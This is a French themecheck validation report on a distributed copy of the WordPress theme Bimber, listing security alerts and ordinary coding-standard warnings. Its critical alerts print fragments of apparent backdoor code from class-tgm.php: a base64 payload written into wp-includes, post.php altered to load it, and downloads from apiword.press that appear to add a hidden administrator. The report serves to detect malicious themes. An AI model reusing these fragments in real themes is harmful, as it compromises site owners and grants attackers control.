0
Résultats de validation

Bimber

Bimber

WordPress 4.9.8 theme
0
Alertes critiques
  1. Failles de sécurité : Utilisation de base64_decode() base64_decode trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  2. Fichiers indésirables : fichiers ou dossiers cachés .css .ds_store a été trouvé.
  3. Code malveillant : Opérations sur système de fichiers file_get_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
  4. Menu Admin : Les thèmes doivent utiliser add_theme_page () pour ajouter des pages admin. Fichier common.php :
    Line 141: add_dashboard_page(
    Fichier class-tgm-plugin-activation.php :
    Line 731: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_t
  5. Inclusion de plugin : Présence de fichier zip Les plugins ne sont pas autorisés dans les thèmes. Le fichier zip whats-your-reaction.zip g1-socials.zip envato-wordpress-toolkit.zip snax.zip a été trouvé.
Attention
  1. tags du thème : Présence de tags inconnusLe tag fluid-layout est obsolète, il ne doit pas figurer dans le header de style.css.
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Une fonction de traduction utilisée sans text-domain. Fonction esc_html_e, avec les arguments 'Use the "inherit" option to apply settings from the Appearance › Customize › Posts › Single section.' dans le fichier page-single-options.php.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont bimber, tgmpa, bimer, buddypress, snax.
  3. Eléments custom : Présence d'une entête customAucune référence à custom header n'a été trouvée dans le thème.
  4. Eléments custom : Présence d'un fond customAucune référence à custom background n'a été trouvée dans le thème.
  5. Screenshot : Copie d'écranMauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  2. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  3. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  4. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  5. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : dynamic-style-cache.php
    Line 34: require_once( BIMBER_FRONT_DIR . 'lib/class-bimber-color.php' );
    Line 35: require_once( BIMBER_FRONT_DIR . 'lib/class-bimber-color-generator.php' );
    Line 38: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-global.php' );
    Line 39: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-header.php' );
    Line 40: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-footer.php' );
    Line 41: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-premade.php' );
    Line 236: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-bimber-color-generator.php
    Line 20: require_once( BIMBER_FRONT_DIR . 'lib/class-bimber-color.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme-setup.php
    Line 113: include_once( BIMBER_ADMIN_DIR . 'customizer/customizer-defaults.php' );
    Line 125: require( BIMBER_ADMIN_DIR . 'theme-options/theme-defaults.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : customizer.php
    Line 27: require_once 'lib/class-bimber-customize-html-control.php';
    Line 28: require_once 'lib/class-bimber-customize-multi-checkbox-control.php';
    Line 29: require_once 'lib/class-bimber-customize-multi-radio-control.php';
    Line 30: require_once 'lib/class-bimber-customize-multi-select-control.php';
    Line 33: require 'customizer-defaults.php';
    Line 35: require_once 'customizer-site-identity.php';
    Line 36: require_once 'customizer-static-front-page.php';
    Line 44: require_once 'customizer-posts-single.php';
    Line 45: require_once 'customizer-posts-archive.php';
    Line 46: require_once 'customizer-posts-global.php';
    Line 47: require_once 'customizer-posts-nsfw.php';
    Line 49: require_once 'customizer-featured-entries.php';
    Line 57: require_once 'customizer-design-global.php';
    Line 58: require_once 'customizer-design-header.php';
    Line 59: require_once 'customizer-design-footer.php';
    Line 62: require_once 'customizer-newsletter.php';
    Line 66: require_once 'customizer-snax.php';
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-tgm-plugin-activation.php
    Line 34: require_once ('class-tgm.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme-options.php
    Line 337: require( $this->get_base_dir() . '/theme-defaults.php' );
    Line 340: require_once( $this->get_base_dir() . '/theme-options-dashboard.php' );
    Line 343: require_once( $this->get_base_dir() . '/theme-options-import-export.php' );
    Line 344: require_once( $this->get_base_dir() . '/theme-options-dynamic-styles.php' )
    Line 345: require_once( $this->get_base_dir() . '/theme-options-logs.php' );
    Line 346: require_once( $this->get_base_dir() . '/theme-options-tasks.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme-options-dashboard.php
    Line 20: include 'theme-options-dashboard-normal.php';
    Line 22: include 'theme-options-dashboard-welcome.php';
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme.php
    Line 76: require( BIMBER_ADMIN_DIR . 'customizer/customizer-defaults.php' );
    Line 77: require( BIMBER_ADMIN_DIR . 'theme-options/theme-defaults.php' );
    Line 348: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : auto-load-next-post.php
    Line 37: require_once( $located );
    Line 39: require_once( trailingslashit( AUTO_LOAD_NEXT_POST_FILE_PATH ) . 'template/
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.

Ceci est un thème distribué surThemeForest. Etant donné que tous les thèmes de Themeforest sont validés par un humain avant d'être mis en ligne, les règles de vérification de Themeforest sont plus permissives que celles de themecheck et peuvent donner un meilleur score de vérification ( Themeforest requirements ).

57
Alertes critiques
  1. Fichiers indésirables : fichiers ou dossiers cachés .css .ds_store a été trouvé.
  2. Inclusion de plugin : Présence de fichier zip Les plugins ne sont pas autorisés dans les thèmes. Le fichier zip whats-your-reaction.zip g1-socials.zip envato-wordpress-toolkit.zip snax.zip a été trouvé.
Attention
  1. tags du thème : Présence de tags inconnusLe tag fluid-layout est obsolète, il ne doit pas figurer dans le header de style.css.
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Une fonction de traduction utilisée sans text-domain. Fonction esc_html_e, avec les arguments 'Use the &quot;inherit&quot; option to apply settings from the Appearance &rsaquo; Customize &rsaquo; Posts &rsaquo; Single section.' dans le fichier page-single-options.php.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont bimber, tgmpa, bimer, buddypress, snax.
  3. Screenshot : Copie d'écranMauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  2. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  3. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  4. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  5. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : dynamic-style-cache.php
    Line 34: require_once( BIMBER_FRONT_DIR . 'lib/class-bimber-color.php' );
    Line 35: require_once( BIMBER_FRONT_DIR . 'lib/class-bimber-color-generator.php' );
    Line 38: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-global.php' );
    Line 39: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-header.php' );
    Line 40: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-footer.php' );
    Line 41: require_once( BIMBER_THEME_DIR . 'css/dynamic-style-premade.php' );
    Line 236: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-bimber-color-generator.php
    Line 20: require_once( BIMBER_FRONT_DIR . 'lib/class-bimber-color.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme-setup.php
    Line 113: include_once( BIMBER_ADMIN_DIR . 'customizer/customizer-defaults.php' );
    Line 125: require( BIMBER_ADMIN_DIR . 'theme-options/theme-defaults.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : customizer.php
    Line 27: require_once 'lib/class-bimber-customize-html-control.php';
    Line 28: require_once 'lib/class-bimber-customize-multi-checkbox-control.php';
    Line 29: require_once 'lib/class-bimber-customize-multi-radio-control.php';
    Line 30: require_once 'lib/class-bimber-customize-multi-select-control.php';
    Line 33: require 'customizer-defaults.php';
    Line 35: require_once 'customizer-site-identity.php';
    Line 36: require_once 'customizer-static-front-page.php';
    Line 44: require_once 'customizer-posts-single.php';
    Line 45: require_once 'customizer-posts-archive.php';
    Line 46: require_once 'customizer-posts-global.php';
    Line 47: require_once 'customizer-posts-nsfw.php';
    Line 49: require_once 'customizer-featured-entries.php';
    Line 57: require_once 'customizer-design-global.php';
    Line 58: require_once 'customizer-design-header.php';
    Line 59: require_once 'customizer-design-footer.php';
    Line 62: require_once 'customizer-newsletter.php';
    Line 66: require_once 'customizer-snax.php';
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-tgm-plugin-activation.php
    Line 34: require_once ('class-tgm.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme-options.php
    Line 337: require( $this->get_base_dir() . '/theme-defaults.php' );
    Line 340: require_once( $this->get_base_dir() . '/theme-options-dashboard.php' );
    Line 343: require_once( $this->get_base_dir() . '/theme-options-import-export.php' );
    Line 344: require_once( $this->get_base_dir() . '/theme-options-dynamic-styles.php' )
    Line 345: require_once( $this->get_base_dir() . '/theme-options-logs.php' );
    Line 346: require_once( $this->get_base_dir() . '/theme-options-tasks.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme-options-dashboard.php
    Line 20: include 'theme-options-dashboard-normal.php';
    Line 22: include 'theme-options-dashboard-welcome.php';
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : theme.php
    Line 76: require( BIMBER_ADMIN_DIR . 'customizer/customizer-defaults.php' );
    Line 77: require( BIMBER_ADMIN_DIR . 'theme-options/theme-defaults.php' );
    Line 348: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : auto-load-next-post.php
    Line 37: require_once( $located );
    Line 39: require_once( trailingslashit( AUTO_LOAD_NEXT_POST_FILE_PATH ) . 'template/
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
Autre thèmes vérifiés